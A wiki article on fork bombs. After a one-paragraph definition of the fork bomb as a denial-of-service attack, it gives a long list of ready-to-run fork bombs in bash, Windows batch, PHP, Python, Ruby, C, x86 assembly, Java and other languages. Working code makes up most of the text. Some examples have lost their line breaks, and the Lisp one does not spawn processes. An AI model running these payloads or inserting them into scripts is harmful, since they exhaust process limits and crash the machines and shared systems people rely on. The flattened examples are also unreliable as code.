Fork Bomb
From Partyvan Wiki
In computing, the fork bomb, a form of denial-of-service attack against a computer system, implements the fork operation (or equivalent functionality) whereby a running process can create another running process. Fork bombs count as wabbits: they typically do not spread as worms or viruses. To incapacitate a system they rely on the (generally valid) assumption that the number of programs and processes which may execute simultaneously on a computer has a limit.
Examples
Using a common shell such as bash or zsh.
:(){ :|:& };:
:() # define ':' -- whenever we say ':', do this: { # beggining of what to do when we say ':' : # load another copy of the ':' function into memory... | # ...and pipe it's output to... : # ...another copy of ':' function, which has to be loaded into memory # (therefore, ':|:' simply gets two copies of ':' loaded whenever ':' is called) & # disown the functions -- if the first ':' is killed, all of the functions that it has started should NOT be auto-killed } # end of what to do when we say ':' ; # Having defined ':', we should now... : # ...call ':', initiating a chain-reaction: each ':' will start two more.
Given that ':' is an arbitrary name for the function, an easier to understand version would be:
forkbomb(){ forkbomb|forkbomb & };forkbomb
A fork bomb using the Windows (any version) batch language:
%0|%0
Or a faster-reacting example:
:s start %0 %0|%0 goto :s
In JavaScript:
while (true) open();
In PHP:
while(1) pcntl_fork();
In PHP only for POSIX compatible systems:
while(pcntl_fork()|1);
In poetic Perl:
fork while fork
In Haskell:
import Control.Monad import System.Posix.Process forkBomb = forever $ forkProcess forkBomb
In Python:
import os while True: os.fork()
In Ruby:
loop { fork }
#include <unistd.h> int main() { while(1) fork(); return 0; }
In x86 FASM for Linux:
format ELF executable entry start start: push 0x2 ; Linux fork system call pop eax ; int 0x80 ; Call to the kernel jmp start ; Loop back to the start
In x86 FASM for Win32:
format PE GUI 4.0 entry start section '.text' code readable executable start: pushd 1000 pushd path pushd 0 call [GetModuleFileName] @@: pushd 1 pushd 0 pushd 0 pushd path pushd command pushd 0 call [ShellExecute] jmp @b section '.data' data readable writeable path rb 1000 command db "open" section '.idata' import data readable writeable dd 0,0,0,RVA kernel32id,RVA kernel32 dd 0,0,0,RVA shell32id,RVA shell32 kernel32: GetModuleFileName dd RVA _GetModuleFileName dd 0 shell32: ShellExecute dd RVA _ShellExecute dd 0 kernel32id db 'kernel32.dll',0 shell32id db 'shell32.dll',0 _GetModuleFileName dw 0 db 'GetModuleFileNameA',0 _ShellExecute dw 0 db 'ShellExecuteA',0 section '.reloc' fixups data readable discardable
In x86 NASM assembly for Linux more detailed:
section .text global _start ;Call start _start: push byte 2 ;syscall to Linux fork pop eax ;set EAX argument for fork to NULL [So it works in strings] int 0x80 ;Execute syscall with fork & the EAX [null, above] argument jmp short _start ;Go back to beginning, causing a fork bomb
Or in Lisp:
(defmacro wabbit () ;; A program that writes code. (let ((fname (gentemp 'INET))) `(progn (defun ,fname () ;; Generate. nil) (wabbit)))) (wabbit) ;; Start multiplying.
Java can also be used, although the fork bomb will only work if the javaw executable is on the path. This fork bomb can be stopped from multiplying by deleting the class file used to run it, although this will not terminate any instances of the fork bomb that have already started.
public class ForkBomb { public static void main(String[] args) { while(true) { Runtime.getRuntime().exec(new String[]{"javaw", "-cp", System.getProperty("java.class.path"), "ForkBomb"}); } } }
